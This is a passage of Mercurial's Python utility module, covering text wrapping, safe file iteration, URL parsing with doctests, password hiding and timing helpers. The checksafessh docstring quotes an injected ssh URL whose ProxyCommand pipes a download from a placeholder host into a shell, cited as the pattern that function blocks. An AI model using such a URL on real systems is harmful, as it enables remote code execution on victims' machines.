2786 2786 so overriding is needed to use width information of each characters.
2787 2787
2788 2788 In addition, characters classified into 'ambiguous' width are
2789 2789 treated as wide in East Asian area, but as narrow in other.
2790 2790
2791 2791 This requires use decision to determine width of such characters.
2792 2792 """
2793 2793 def _cutdown(self, ucstr, space_left):
2794 2794 l = 0
2795 2795 colwidth = encoding.ucolwidth
2796 2796 for i in xrange(len(ucstr)):
2797 2797 l += colwidth(ucstr[i])
2798 2798 if space_left < l:
2799 2799 return (ucstr[:i], ucstr[i:])
2800 2800 return ucstr, ''
2801 2801
2802 2802 # overriding of base class
2803 2803 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2804 2804 space_left = max(width - cur_len, 1)
2805 2805
2806 2806 if self.break_long_words:
2807 2807 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2808 2808 cur_line.append(cut)
2809 2809 reversed_chunks[-1] = res
2810 2810 elif not cur_line:
2811 2811 cur_line.append(reversed_chunks.pop())
2812 2812
2813 2813 # this overriding code is imported from TextWrapper of Python 2.6
2814 2814 # to calculate columns of string by 'encoding.ucolwidth()'
2815 2815 def _wrap_chunks(self, chunks):
2816 2816 colwidth = encoding.ucolwidth
2817 2817
2818 2818 lines = []
2819 2819 if self.width <= 0:
2820 2820 raise ValueError("invalid width %r (must be > 0)" % self.width)
2821 2821
2822 2822 # Arrange in reverse order so items can be efficiently popped
2823 2823 # from a stack of chucks.
2824 2824 chunks.reverse()
2825 2825
2826 2826 while chunks:
2827 2827
2828 2828 # Start the list of chunks that will make up the current line.
2829 2829 # cur_len is just the length of all the chunks in cur_line.
2830 2830 cur_line = []
2831 2831 cur_len = 0
2832 2832
2833 2833 # Figure out which static string will prefix this line.
2834 2834 if lines:
2835 2835 indent = self.subsequent_indent
2836 2836 else:
2837 2837 indent = self.initial_indent
2838 2838
2839 2839 # Maximum width for this line.
2840 2840 width = self.width - len(indent)
2841 2841
2842 2842 # First chunk on line is whitespace -- drop it, unless this
2843 2843 # is the very beginning of the text (i.e. no lines started yet).
2844 2844 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2845 2845 del chunks[-1]
2846 2846
2847 2847 while chunks:
2848 2848 l = colwidth(chunks[-1])
2849 2849
2850 2850 # Can at least squeeze this chunk onto the current line.
2851 2851 if cur_len + l <= width:
2852 2852 cur_line.append(chunks.pop())
2853 2853 cur_len += l
2854 2854
2855 2855 # Nope, this line is full.
2856 2856 else:
2857 2857 break
2858 2858
2859 2859 # The current line is full, and the next chunk is too big to
2860 2860 # fit on *any* line (not just this one).
2861 2861 if chunks and colwidth(chunks[-1]) > width:
2862 2862 self._handle_long_word(chunks, cur_line, cur_len, width)
2863 2863
2864 2864 # If the last chunk on this line is all whitespace, drop it.
2865 2865 if (self.drop_whitespace and
2866 2866 cur_line and cur_line[-1].strip() == r''):
2867 2867 del cur_line[-1]
2868 2868
2869 2869 # Convert current line back to a string and store it in list
2870 2870 # of all lines (return value).
2871 2871 if cur_line:
2872 2872 lines.append(indent + r''.join(cur_line))
2873 2873
2874 2874 return lines
2875 2875
2876 2876 global MBTextWrapper
2877 2877 MBTextWrapper = tw
2878 2878 return tw(**kwargs)
2879 2879
2880 2880 def wrap(line, width, initindent='', hangindent=''):
2881 2881 maxindent = max(len(hangindent), len(initindent))
2882 2882 if width <= maxindent:
2883 2883 # adjust for weird terminal size
2884 2884 width = max(78, maxindent + 1)
2885 2885 line = line.decode(pycompat.sysstr(encoding.encoding),
2886 2886 pycompat.sysstr(encoding.encodingmode))
2887 2887 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2888 2888 pycompat.sysstr(encoding.encodingmode))
2889 2889 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2890 2890 pycompat.sysstr(encoding.encodingmode))
2891 2891 wrapper = MBTextWrapper(width=width,
2892 2892 initial_indent=initindent,
2893 2893 subsequent_indent=hangindent)
2894 2894 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2895 2895
2896 2896 if (pyplatform.python_implementation() == 'CPython' and
2897 2897 sys.version_info < (3, 0)):
2898 2898 # There is an issue in CPython that some IO methods do not handle EINTR
2899 2899 # correctly. The following table shows what CPython version (and functions)
2900 2900 # are affected (buggy: has the EINTR bug, okay: otherwise):
2901 2901 #
2902 2902 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2903 2903 # --------------------------------------------------
2904 2904 # fp.__iter__ | buggy | buggy | okay
2905 2905 # fp.read* | buggy | okay [1] | okay
2906 2906 #
2907 2907 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2908 2908 #
2909 2909 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2910 2910 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2911 2911 #
2912 2912 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2913 2913 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2914 2914 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2915 2915 # fp.__iter__ but not other fp.read* methods.
2916 2916 #
2917 2917 # On modern systems like Linux, the "read" syscall cannot be interrupted
2918 2918 # when reading "fast" files like on-disk files. So the EINTR issue only
2919 2919 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2920 2920 # files approximately as "fast" files and use the fast (unsafe) code path,
2921 2921 # to minimize the performance impact.
2922 2922 if sys.version_info >= (2, 7, 4):
2923 2923 # fp.readline deals with EINTR correctly, use it as a workaround.
2924 2924 def _safeiterfile(fp):
2925 2925 return iter(fp.readline, '')
2926 2926 else:
2927 2927 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2928 2928 # note: this may block longer than necessary because of bufsize.
2929 2929 def _safeiterfile(fp, bufsize=4096):
2930 2930 fd = fp.fileno()
2931 2931 line = ''
2932 2932 while True:
2933 2933 try:
2934 2934 buf = os.read(fd, bufsize)
2935 2935 except OSError as ex:
2936 2936 # os.read only raises EINTR before any data is read
2937 2937 if ex.errno == errno.EINTR:
2938 2938 continue
2939 2939 else:
2940 2940 raise
2941 2941 line += buf
2942 2942 if '\n' in buf:
2943 2943 splitted = line.splitlines(True)
2944 2944 line = ''
2945 2945 for l in splitted:
2946 2946 if l[-1] == '\n':
2947 2947 yield l
2948 2948 else:
2949 2949 line = l
2950 2950 if not buf:
2951 2951 break
2952 2952 if line:
2953 2953 yield line
2954 2954
2955 2955 def iterfile(fp):
2956 2956 fastpath = True
2957 2957 if type(fp) is file:
2958 2958 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2959 2959 if fastpath:
2960 2960 return fp
2961 2961 else:
2962 2962 return _safeiterfile(fp)
2963 2963 else:
2964 2964 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2965 2965 def iterfile(fp):
2966 2966 return fp
2967 2967
2968 2968 def iterlines(iterator):
2969 2969 for chunk in iterator:
2970 2970 for line in chunk.splitlines():
2971 2971 yield line
2972 2972
2973 2973 def expandpath(path):
2974 2974 return os.path.expanduser(os.path.expandvars(path))
2975 2975
2976 2976 def hgcmd():
2977 2977 """Return the command used to execute current hg
2978 2978
2979 2979 This is different from hgexecutable() because on Windows we want
2980 2980 to avoid things opening new shell windows like batch files, so we
2981 2981 get either the python call or current executable.
2982 2982 """
2983 2983 if mainfrozen():
2984 2984 if getattr(sys, 'frozen', None) == 'macosx_app':
2985 2985 # Env variable set by py2app
2986 2986 return [encoding.environ['EXECUTABLEPATH']]
2987 2987 else:
2988 2988 return [pycompat.sysexecutable]
2989 2989 return gethgcmd()
2990 2990
2991 2991 def rundetached(args, condfn):
2992 2992 """Execute the argument list in a detached process.
2993 2993
2994 2994 condfn is a callable which is called repeatedly and should return
2995 2995 True once the child process is known to have started successfully.
2996 2996 At this point, the child process PID is returned. If the child
2997 2997 process fails to start or finishes before condfn() evaluates to
2998 2998 True, return -1.
2999 2999 """
3000 3000 # Windows case is easier because the child process is either
3001 3001 # successfully starting and validating the condition or exiting
3002 3002 # on failure. We just poll on its PID. On Unix, if the child
3003 3003 # process fails to start, it will be left in a zombie state until
3004 3004 # the parent wait on it, which we cannot do since we expect a long
3005 3005 # running process on success. Instead we listen for SIGCHLD telling
3006 3006 # us our child process terminated.
3007 3007 terminated = set()
3008 3008 def handler(signum, frame):
3009 3009 terminated.add(os.wait())
3010 3010 prevhandler = None
3011 3011 SIGCHLD = getattr(signal, 'SIGCHLD', None)
3012 3012 if SIGCHLD is not None:
3013 3013 prevhandler = signal.signal(SIGCHLD, handler)
3014 3014 try:
3015 3015 pid = spawndetached(args)
3016 3016 while not condfn():
3017 3017 if ((pid in terminated or not testpid(pid))
3018 3018 and not condfn()):
3019 3019 return -1
3020 3020 time.sleep(0.1)
3021 3021 return pid
3022 3022 finally:
3023 3023 if prevhandler is not None:
3024 3024 signal.signal(signal.SIGCHLD, prevhandler)
3025 3025
3026 3026 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
3027 3027 """Return the result of interpolating items in the mapping into string s.
3028 3028
3029 3029 prefix is a single character string, or a two character string with
3030 3030 a backslash as the first character if the prefix needs to be escaped in
3031 3031 a regular expression.
3032 3032
3033 3033 fn is an optional function that will be applied to the replacement text
3034 3034 just before replacement.
3035 3035
3036 3036 escape_prefix is an optional flag that allows using doubled prefix for
3037 3037 its escaping.
3038 3038 """
3039 3039 fn = fn or (lambda s: s)
3040 3040 patterns = '|'.join(mapping.keys())
3041 3041 if escape_prefix:
3042 3042 patterns += '|' + prefix
3043 3043 if len(prefix) > 1:
3044 3044 prefix_char = prefix[1:]
3045 3045 else:
3046 3046 prefix_char = prefix
3047 3047 mapping[prefix_char] = prefix_char
3048 3048 r = remod.compile(br'%s(%s)' % (prefix, patterns))
3049 3049 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3050 3050
3051 3051 def getport(port):
3052 3052 """Return the port for a given network service.
3053 3053
3054 3054 If port is an integer, it's returned as is. If it's a string, it's
3055 3055 looked up using socket.getservbyname(). If there's no matching
3056 3056 service, error.Abort is raised.
3057 3057 """
3058 3058 try:
3059 3059 return int(port)
3060 3060 except ValueError:
3061 3061 pass
3062 3062
3063 3063 try:
3064 3064 return socket.getservbyname(pycompat.sysstr(port))
3065 3065 except socket.error:
3066 3066 raise Abort(_("no port number associated with service '%s'") % port)
3067 3067
3068 3068 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
3069 3069 '0': False, 'no': False, 'false': False, 'off': False,
3070 3070 'never': False}
3071 3071
3072 3072 def parsebool(s):
3073 3073 """Parse s into a boolean.
3074 3074
3075 3075 If s is not a valid boolean, returns None.
3076 3076 """
3077 3077 return _booleans.get(s.lower(), None)
3078 3078
3079 3079 _hextochr = dict((a + b, chr(int(a + b, 16)))
3080 3080 for a in string.hexdigits for b in string.hexdigits)
3081 3081
3082 3082 class url(object):
3083 3083 r"""Reliable URL parser.
3084 3084
3085 3085 This parses URLs and provides attributes for the following
3086 3086 components:
3087 3087
3088 3088 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3089 3089
3090 3090 Missing components are set to None. The only exception is
3091 3091 fragment, which is set to '' if present but empty.
3092 3092
3093 3093 If parsefragment is False, fragment is included in query. If
3094 3094 parsequery is False, query is included in path. If both are
3095 3095 False, both fragment and query are included in path.
3096 3096
3097 3097 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3098 3098
3099 3099 Note that for backward compatibility reasons, bundle URLs do not
3100 3100 take host names. That means 'bundle://../' has a path of '../'.
3101 3101
3102 3102 Examples:
3103 3103
3104 3104 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3105 3105 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3106 3106 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3107 3107 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3108 3108 >>> url(b'file:///home/joe/repo')
3109 3109 <url scheme: 'file', path: '/home/joe/repo'>
3110 3110 >>> url(b'file:///c:/temp/foo/')
3111 3111 <url scheme: 'file', path: 'c:/temp/foo/'>
3112 3112 >>> url(b'bundle:foo')
3113 3113 <url scheme: 'bundle', path: 'foo'>
3114 3114 >>> url(b'bundle://../foo')
3115 3115 <url scheme: 'bundle', path: '../foo'>
3116 3116 >>> url(br'c:\foo\bar')
3117 3117 <url path: 'c:\\foo\\bar'>
3118 3118 >>> url(br'\\blah\blah\blah')
3119 3119 <url path: '\\\\blah\\blah\\blah'>
3120 3120 >>> url(br'\\blah\blah\blah#baz')
3121 3121 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3122 3122 >>> url(br'file:///C:\users\me')
3123 3123 <url scheme: 'file', path: 'C:\\users\\me'>
3124 3124
3125 3125 Authentication credentials:
3126 3126
3127 3127 >>> url(b'ssh://joe:xyz@x/repo')
3128 3128 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3129 3129 >>> url(b'ssh://joe@x/repo')
3130 3130 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3131 3131
3132 3132 Query strings and fragments:
3133 3133
3134 3134 >>> url(b'http://host/a?b#c')
3135 3135 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3136 3136 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3137 3137 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3138 3138
3139 3139 Empty path:
3140 3140
3141 3141 >>> url(b'')
3142 3142 <url path: ''>
3143 3143 >>> url(b'#a')
3144 3144 <url path: '', fragment: 'a'>
3145 3145 >>> url(b'http://host/')
3146 3146 <url scheme: 'http', host: 'host', path: ''>
3147 3147 >>> url(b'http://host/#a')
3148 3148 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3149 3149
3150 3150 Only scheme:
3151 3151
3152 3152 >>> url(b'http:')
3153 3153 <url scheme: 'http'>
3154 3154 """
3155 3155
3156 3156 _safechars = "!~*'()+"
3157 3157 _safepchars = "/!~*'()+:\\"
3158 3158 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3159 3159
3160 3160 def __init__(self, path, parsequery=True, parsefragment=True):
3161 3161 # We slowly chomp away at path until we have only the path left
3162 3162 self.scheme = self.user = self.passwd = self.host = None
3163 3163 self.port = self.path = self.query = self.fragment = None
3164 3164 self._localpath = True
3165 3165 self._hostport = ''
3166 3166 self._origpath = path
3167 3167
3168 3168 if parsefragment and '#' in path:
3169 3169 path, self.fragment = path.split('#', 1)
3170 3170
3171 3171 # special case for Windows drive letters and UNC paths
3172 3172 if hasdriveletter(path) or path.startswith('\\\\'):
3173 3173 self.path = path
3174 3174 return
3175 3175
3176 3176 # For compatibility reasons, we can't handle bundle paths as
3177 3177 # normal URLS
3178 3178 if path.startswith('bundle:'):
3179 3179 self.scheme = 'bundle'
3180 3180 path = path[7:]
3181 3181 if path.startswith('//'):
3182 3182 path = path[2:]
3183 3183 self.path = path
3184 3184 return
3185 3185
3186 3186 if self._matchscheme(path):
3187 3187 parts = path.split(':', 1)
3188 3188 if parts[0]:
3189 3189 self.scheme, path = parts
3190 3190 self._localpath = False
3191 3191
3192 3192 if not path:
3193 3193 path = None
3194 3194 if self._localpath:
3195 3195 self.path = ''
3196 3196 return
3197 3197 else:
3198 3198 if self._localpath:
3199 3199 self.path = path
3200 3200 return
3201 3201
3202 3202 if parsequery and '?' in path:
3203 3203 path, self.query = path.split('?', 1)
3204 3204 if not path:
3205 3205 path = None
3206 3206 if not self.query:
3207 3207 self.query = None
3208 3208
3209 3209 # // is required to specify a host/authority
3210 3210 if path and path.startswith('//'):
3211 3211 parts = path[2:].split('/', 1)
3212 3212 if len(parts) > 1:
3213 3213 self.host, path = parts
3214 3214 else:
3215 3215 self.host = parts[0]
3216 3216 path = None
3217 3217 if not self.host:
3218 3218 self.host = None
3219 3219 # path of file:///d is /d
3220 3220 # path of file:///d:/ is d:/, not /d:/
3221 3221 if path and not hasdriveletter(path):
3222 3222 path = '/' + path
3223 3223
3224 3224 if self.host and '@' in self.host:
3225 3225 self.user, self.host = self.host.rsplit('@', 1)
3226 3226 if ':' in self.user:
3227 3227 self.user, self.passwd = self.user.split(':', 1)
3228 3228 if not self.host:
3229 3229 self.host = None
3230 3230
3231 3231 # Don't split on colons in IPv6 addresses without ports
3232 3232 if (self.host and ':' in self.host and
3233 3233 not (self.host.startswith('[') and self.host.endswith(']'))):
3234 3234 self._hostport = self.host
3235 3235 self.host, self.port = self.host.rsplit(':', 1)
3236 3236 if not self.host:
3237 3237 self.host = None
3238 3238
3239 3239 if (self.host and self.scheme == 'file' and
3240 3240 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3241 3241 raise Abort(_('file:// URLs can only refer to localhost'))
3242 3242
3243 3243 self.path = path
3244 3244
3245 3245 # leave the query string escaped
3246 3246 for a in ('user', 'passwd', 'host', 'port',
3247 3247 'path', 'fragment'):
3248 3248 v = getattr(self, a)
3249 3249 if v is not None:
3250 3250 setattr(self, a, urlreq.unquote(v))
3251 3251
3252 3252 @encoding.strmethod
3253 3253 def __repr__(self):
3254 3254 attrs = []
3255 3255 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3256 3256 'query', 'fragment'):
3257 3257 v = getattr(self, a)
3258 3258 if v is not None:
3259 3259 attrs.append('%s: %r' % (a, v))
3260 3260 return '<url %s>' % ', '.join(attrs)
3261 3261
3262 3262 def __bytes__(self):
3263 3263 r"""Join the URL's components back into a URL string.
3264 3264
3265 3265 Examples:
3266 3266
3267 3267 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3268 3268 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3269 3269 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3270 3270 'http://user:pw@host:80/?foo=bar&baz=42'
3271 3271 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3272 3272 'http://user:pw@host:80/?foo=bar%3dbaz'
3273 3273 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3274 3274 'ssh://user:pw@[::1]:2200//home/joe#'
3275 3275 >>> bytes(url(b'http://localhost:80//'))
3276 3276 'http://localhost:80//'
3277 3277 >>> bytes(url(b'http://localhost:80/'))
3278 3278 'http://localhost:80/'
3279 3279 >>> bytes(url(b'http://localhost:80'))
3280 3280 'http://localhost:80/'
3281 3281 >>> bytes(url(b'bundle:foo'))
3282 3282 'bundle:foo'
3283 3283 >>> bytes(url(b'bundle://../foo'))
3284 3284 'bundle:../foo'
3285 3285 >>> bytes(url(b'path'))
3286 3286 'path'
3287 3287 >>> bytes(url(b'file:///tmp/foo/bar'))
3288 3288 'file:///tmp/foo/bar'
3289 3289 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3290 3290 'file:///c:/tmp/foo/bar'
3291 3291 >>> print(url(br'bundle:foo\bar'))
3292 3292 bundle:foo\bar
3293 3293 >>> print(url(br'file:///D:\data\hg'))
3294 3294 file:///D:\data\hg
3295 3295 """
3296 3296 if self._localpath:
3297 3297 s = self.path
3298 3298 if self.scheme == 'bundle':
3299 3299 s = 'bundle:' + s
3300 3300 if self.fragment:
3301 3301 s += '#' + self.fragment
3302 3302 return s
3303 3303
3304 3304 s = self.scheme + ':'
3305 3305 if self.user or self.passwd or self.host:
3306 3306 s += '//'
3307 3307 elif self.scheme and (not self.path or self.path.startswith('/')
3308 3308 or hasdriveletter(self.path)):
3309 3309 s += '//'
3310 3310 if hasdriveletter(self.path):
3311 3311 s += '/'
3312 3312 if self.user:
3313 3313 s += urlreq.quote(self.user, safe=self._safechars)
3314 3314 if self.passwd:
3315 3315 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3316 3316 if self.user or self.passwd:
3317 3317 s += '@'
3318 3318 if self.host:
3319 3319 if not (self.host.startswith('[') and self.host.endswith(']')):
3320 3320 s += urlreq.quote(self.host)
3321 3321 else:
3322 3322 s += self.host
3323 3323 if self.port:
3324 3324 s += ':' + urlreq.quote(self.port)
3325 3325 if self.host:
3326 3326 s += '/'
3327 3327 if self.path:
3328 3328 # TODO: similar to the query string, we should not unescape the
3329 3329 # path when we store it, the path might contain '%2f' = '/',
3330 3330 # which we should *not* escape.
3331 3331 s += urlreq.quote(self.path, safe=self._safepchars)
3332 3332 if self.query:
3333 3333 # we store the query in escaped form.
3334 3334 s += '?' + self.query
3335 3335 if self.fragment is not None:
3336 3336 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3337 3337 return s
3338 3338
3339 3339 __str__ = encoding.strmethod(__bytes__)
3340 3340
3341 3341 def authinfo(self):
3342 3342 user, passwd = self.user, self.passwd
3343 3343 try:
3344 3344 self.user, self.passwd = None, None
3345 3345 s = bytes(self)
3346 3346 finally:
3347 3347 self.user, self.passwd = user, passwd
3348 3348 if not self.user:
3349 3349 return (s, None)
3350 3350 # authinfo[1] is passed to urllib2 password manager, and its
3351 3351 # URIs must not contain credentials. The host is passed in the
3352 3352 # URIs list because Python < 2.4.3 uses only that to search for
3353 3353 # a password.
3354 3354 return (s, (None, (s, self.host),
3355 3355 self.user, self.passwd or ''))
3356 3356
3357 3357 def isabs(self):
3358 3358 if self.scheme and self.scheme != 'file':
3359 3359 return True # remote URL
3360 3360 if hasdriveletter(self.path):
3361 3361 return True # absolute for our purposes - can't be joined()
3362 3362 if self.path.startswith(br'\\'):
3363 3363 return True # Windows UNC path
3364 3364 if self.path.startswith('/'):
3365 3365 return True # POSIX-style
3366 3366 return False
3367 3367
3368 3368 def localpath(self):
3369 3369 if self.scheme == 'file' or self.scheme == 'bundle':
3370 3370 path = self.path or '/'
3371 3371 # For Windows, we need to promote hosts containing drive
3372 3372 # letters to paths with drive letters.
3373 3373 if hasdriveletter(self._hostport):
3374 3374 path = self._hostport + '/' + self.path
3375 3375 elif (self.host is not None and self.path
3376 3376 and not hasdriveletter(path)):
3377 3377 path = '/' + path
3378 3378 return path
3379 3379 return self._origpath
3380 3380
3381 3381 def islocal(self):
3382 3382 '''whether localpath will return something that posixfile can open'''
3383 3383 return (not self.scheme or self.scheme == 'file'
3384 3384 or self.scheme == 'bundle')
3385 3385
3386 3386 def hasscheme(path):
3387 3387 return bool(url(path).scheme)
3388 3388
3389 3389 def hasdriveletter(path):
3390 3390 return path and path[1:2] == ':' and path[0:1].isalpha()
3391 3391
3392 3392 def urllocalpath(path):
3393 3393 return url(path, parsequery=False, parsefragment=False).localpath()
3394 3394
3395 3395 def checksafessh(path):
3396 3396 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3397 3397
3398 3398 This is a sanity check for ssh urls. ssh will parse the first item as
3399 3399 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3400 3400 Let's prevent these potentially exploited urls entirely and warn the
3401 3401 user.
3402 3402
3403 3403 Raises an error.Abort when the url is unsafe.
3404 3404 """
3405 3405 path = urlreq.unquote(path)
3406 3406 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3407 3407 raise error.Abort(_('potentially unsafe url: %r') %
3408 3408 (pycompat.bytestr(path),))
3409 3409
3410 3410 def hidepassword(u):
3411 3411 '''hide user credential in a url string'''
3412 3412 u = url(u)
3413 3413 if u.passwd:
3414 3414 u.passwd = '***'
3415 3415 return bytes(u)
3416 3416
3417 3417 def removeauth(u):
3418 3418 '''remove all authentication information from a url string'''
3419 3419 u = url(u)
3420 3420 u.user = u.passwd = None
3421 3421 return str(u)
3422 3422
3423 3423 timecount = unitcountfn(
3424 3424 (1, 1e3, _('%.0f s')),
3425 3425 (100, 1, _('%.1f s')),
3426 3426 (10, 1, _('%.2f s')),
3427 3427 (1, 1, _('%.3f s')),
3428 3428 (100, 0.001, _('%.1f ms')),
3429 3429 (10, 0.001, _('%.2f ms')),
3430 3430 (1, 0.001, _('%.3f ms')),
3431 3431 (100, 0.000001, _('%.1f us')),
3432 3432 (10, 0.000001, _('%.2f us')),
3433 3433 (1, 0.000001, _('%.3f us')),
3434 3434 (100, 0.000000001, _('%.1f ns')),
3435 3435 (10, 0.000000001, _('%.2f ns')),
3436 3436 (1, 0.000000001, _('%.3f ns')),
3437 3437 )
3438 3438
3439 3439 _timenesting = [0]
3440 3440
3441 3441 def timed(func):
3442 3442 '''Report the execution time of a function call to stderr.
3443 3443
3444 3444 During development, use as a decorator when you need to measure
3445 3445 the cost of a function, e.g. as follows:
3446 3446
3447 3447 @util.timed
3448 3448 def foo(a, b, c):
3449 3449 pass
3450 3450 '''
3451 3451
3452 3452 def wrapper(*args, **kwargs):
3453 3453 start = timer()
3454 3454 indent = 2
3455 3455 _timenesting[0] += indent
3456 3456 try:
3457 3457 return func(*args, **kwargs)
3458 3458 finally:
3459 3459 elapsed = timer() - start
3460 3460 _timenesting[0] -= indent
3461 3461 stderr.write('%s%s: %s\n' %
3462 3462 (' ' * _timenesting[0], func.__name__,
3463 3463 timecount(elapsed)))
3464 3464 return wrapper
3465 3465
3466 3466 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3467 3467 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3468 3468
3469 3469 def sizetoint(s):
3470 3470 '''Convert a space specifier to a byte count.
3471 3471
3472 3472 >>> sizetoint(b'30')
3473 3473 30
3474 3474 >>> sizetoint(b'2.2kb')
3475 3475 2252
3476 3476 >>> sizetoint(b'6M')
3477 3477 6291456
3478 3478 '''
3479 3479 t = s.strip().lower()
3480 3480 try:
3481 3481 for k, u in _sizeunits:
3482 3482 if t.endswith(k):
3483 3483 return int(float(t[:-len(k)]) * u)
3484 3484 return int(t)
3485 3485 except ValueError:
3486 3486 raise error.ParseError(_("couldn't parse size: %s") % s)
3487 3487
3488 3488 class hooks(object):
3489 3489 '''A collection of hook functions that can be used to extend a
3490 3490 function's behavior. Hooks are called in lexicographic order,
3491 3491 based on the names of their sources.'''
3492 3492
3493 3493 def __init__(self):
3494 3494 self._hooks = []
3495 3495
3496 3496 def add(self, source, hook):
3497 3497 self._hooks.append((source, hook))
3498 3498
3499 3499 def __call__(self, *args):
3500 3500 self._hooks.sort(key=lambda x: x[0])
3501 3501 results = []
3502 3502 for source, hook in self._hooks:
3503 3503 results.append(hook(*args))
3504 3504 return results
3505 3505
3506 3506 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3507 3507 '''Yields lines for a nicely formatted stacktrace.
3508 3508 Skips the 'skip' last entries, then return the last 'depth' entries.
3509 3509 Each file+linenumber is formatted according to fileline.
3510 3510 Each line is formatted according to line.
3511 3511 If line is None, it yields:
3512 3512 length of longest filepath+line number,
3513 3513 filepath+linenumber,
3514 3514 function
3515 3515
3516 3516 Not be used in production code but very convenient while developing.
3517 3517 '''
3518 3518 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3519 3519 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3520 3520 ][-depth:]
3521 3521 if entries:
3522 3522 fnmax = max(len(entry[0]) for entry in entries)
3523 3523 for fnln, func in entries:
3524 3524 if line is None:
3525 3525 yield (fnmax, fnln, func)
3526 3526 else:
3527 3527 yield line % (fnmax, fnln, func)
3528 3528
3529 3529 def debugstacktrace(msg='stacktrace', skip=0,
3530 3530 f=stderr, otherf=stdout, depth=0):
3531 3531 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3532 3532 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3533 3533 By default it will flush stdout first.
3534 3534 It can be used everywhere and intentionally does not require an ui object.
3535 3535 Not be used in production code but very convenient while developing.
3536 3536 '''
3537 3537 if otherf:
3538 3538 otherf.flush()
3539 3539 f.write('%s at:\n' % msg.rstrip())
3540 3540 for line in getstackframes(skip + 1, depth=depth):
3541 3541 f.write(line)
3542 3542 f.flush()
3543 3543
3544 3544 class dirs(object):
3545 3545 '''a multiset of directory names from a dirstate or manifest'''
3546 3546
3547 3547 def __init__(self, map, skip=None):
3548 3548 self._dirs = {}
3549 3549 addpath = self.addpath
3550 3550 if safehasattr(map, 'iteritems') and skip is not None:
3551 3551 for f, s in map.iteritems():
3552 3552 if s[0] != skip:
3553 3553 addpath(f)
3554 3554 else:
3555 3555 for f in map:
3556 3556 addpath(f)
3557 3557
3558 3558 def addpath(self, path):
3559 3559 dirs = self._dirs
3560 3560 for base in finddirs(path):
3561 3561 if base in dirs:
3562 3562 dirs[base] += 1
3563 3563 return
3564 3564 dirs[base] = 1
3565 3565
3566 3566 def delpath(self, path):
3567 3567 dirs = self._dirs
3568 3568 for base in finddirs(path):
3569 3569 if dirs[base] > 1:
3570 3570 dirs[base] -= 1
3571 3571 return
3572 3572 del dirs[base]
3573 3573
3574 3574 def __iter__(self):
3575 3575 return iter(self._dirs)
3576 3576
3577 3577 def __contains__(self, d):
3578 3578 return d in self._dirs
3579 3579
3580 3580 if safehasattr(parsers, 'dirs'):
3581 3581 dirs = parsers.dirs
3582 3582
3583 3583 def finddirs(path):
3584 3584 pos = path.rfind('/')
3585 3585 while pos != -1:
3586 3586 yield path[:pos]
3587 3587 pos = path.rfind('/', 0, pos)
3588 3588
3589 3589 # compression code
3590 3590
3591 3591 SERVERROLE = 'server'
3592 3592 CLIENTROLE = 'client'
3593 3593
3594 3594 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3595 3595 (u'name', u'serverpriority',
3596 3596 u'clientpriority'))
3597 3597
3598 3598 class compressormanager(object):
3599 3599 """Holds registrations of various compression engines.
3600 3600
3601 3601 This class essentially abstracts the differences between compression
3602 3602 engines to allow new compression formats to be added easily, possibly from
3603 3603 extensions.
3604 3604
3605 3605 Compressors are registered against the global instance by calling its
3606 3606 ``register()`` method.
3607 3607 """
